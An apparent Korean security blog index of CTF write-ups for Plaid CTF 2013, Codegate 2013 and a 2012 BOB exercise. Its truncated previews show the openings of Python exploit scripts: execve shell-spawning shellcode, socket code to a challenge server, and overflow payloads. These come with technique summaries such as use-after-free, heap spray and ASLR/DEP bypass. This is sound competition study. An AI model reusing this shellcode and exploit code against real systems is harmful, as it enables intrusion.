Plaid CTF 2013 Write up collection
·
CTF/2013
Challenges- http://shell-storm.org/repo/CTF/PlaidCTF-2013/ Write-upPwnable----------------------------------------------------pork - http://pastie.org/7693773- http://pwn3r.tistory.com/entry/Plaid-CTF-2013-pork- http://bases-hacking.org/pork-pctf2013.html- http://www.bases-hacking.org/pork-pctf2013.html ropsaurusrex- http://hackerschool.org/temp/pctf2013/ropasaurusrex_exp.py- http://codezen.fr/2..
Plaid CTF 2013 - pork (Exploit only)
·
CTF/2013
Category : Pwnables Summary : simple remote buffer overflow Exploit#!/usr/bin/python from socket import *from struct import pack HOST = "184.72.73.160"PORT = 33227 shellcode_loader= "\x33\xc0\x33\xd2\x31\xdb\x42\xc1\xe2\x08\x43\x43\x43\x43\x04\x03\x54\x59\x81\xc1\x10\xfe\xff\xff\xcd\x80\x3c\x02\x7e\x02\xff\xe1\x31\xc0\x40\x89\xc3\xcd\x80"# read(4, buf, 0x100) -> buf();SHELLCODE = "\x31\xdb\xf7\x..
Codegate 2013 Qual - Vulnerab 500 (Exploit only)
·
CTF/2013
Category : Pwnables Summary : signed integer, use-after-free, heap-spray, ASLR & DEP bypass Exploit#!/usr/bin/python import sysfrom struct import pack show= lambda : sys.stdout.write("1\n")add = lambda title, url: sys.stdout.write("2\n"+title+"\n"+url+"\n")modify= lambda num, title, url: sys.stdout.write("3\n"+"1\n"+num+"\n"+title+"\n"+url+"\n")delete = lambda num: sys.stdout.write("4\n"+"1\n"+n..
Codegate 2013 Qual - Vulnerab 400 (Exploit only)
·
CTF/2013
Category : Pwnables Summary : use-after-free, using uninitialized function pointer Exploit#!/usr/bin/python import sysfrom struct import pack write = lambda author, title, content: sys.stdout.write("1\n"+author+"\n"+title+"\n"+content+"\n")read = lambda idx: sys.stdout.write("2\n"+str(idx)+"\n") delete = lambda: sys.stdout.write("1\n")modify = lambda author, title: sys.stdout.write("2\n"+author+..
Codegate 2013 Qual - Vulnerab 300 (Exploit only)
·
CTF/2013
Category : Pwnables Summary : arbitrary memory overwrite, vtable Exploit#!/usr/bin/python from socket import * shellcode = "\x31\xc0\xb0\x31\xcd\x80\x89\xc3\x89\xc1\x31\xc0\xb0\x46\xcd\x80\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80" payload = ""payload += "-4\n"payload += "\xe4\x91\x04\x08"payload += "\xe8\x91\x04\x08"payload += "\x90"*0x3..
Codegate 2013 Qual - Vulnerab 200 (Exploit only)
·
CTF/2013
Category : Pwnables Summary : simple stack-based remote buffer overflow Exploit#!/usr/bin/python from socket import *from struct import pack p = lambda x : pack("
Codegate 2013 Qual Pwnable Chal Exploits
·
CTF/2013
이번 2013년 Codegate 2013 CTF 예선전에 출제됬던 pwnable분야 문제들의 Exploit 및 Solution입니다. Vuln100 : Not yetVuln200 : http://pwn3r.tistory.com/entry/Codegate-2013-Qual-Vulnerab-200Vuln300 : http://pwn3r.tistory.com/entry/Codegate-2013-Qual-Vulnerab-300Vuln400 : http://pwn3r.tistory.com/entry/Codegate-2013-Qual-Vulnerab-400Vuln500 : http://pwn3r.tistory.com/entry/Codegate-2013-Qual-Vulnerab-500
BOB 1기 모의사이버전 - memod
·
CTF/2012
고려대학교 워룸에서 진행된 BOB 1기의 모의 사이버전에 출제했던 문제입니다. 모의 사이버전 중 점령전 문제로 설정되어 진행되었는데, 대체로 점령전 참여율이 저조했습니다 ㅋㅋㅋ 제일 세팅기간 길었던 부분인데 ㅜㅜ 모의 사이버전 기간이 짧은걸 고려해 대체로 크기가 작게 출제해서 컨셉을 못살린것 같아 살짝 아쉽긴 하네요ㅋㅋ 암튼 재밌으셨길!------------------------------------------------------------------------------------------------------------------------------------------- Category : Pwnable Summary : 1byte overflow, Bypass stack canary with..

티스토리툴바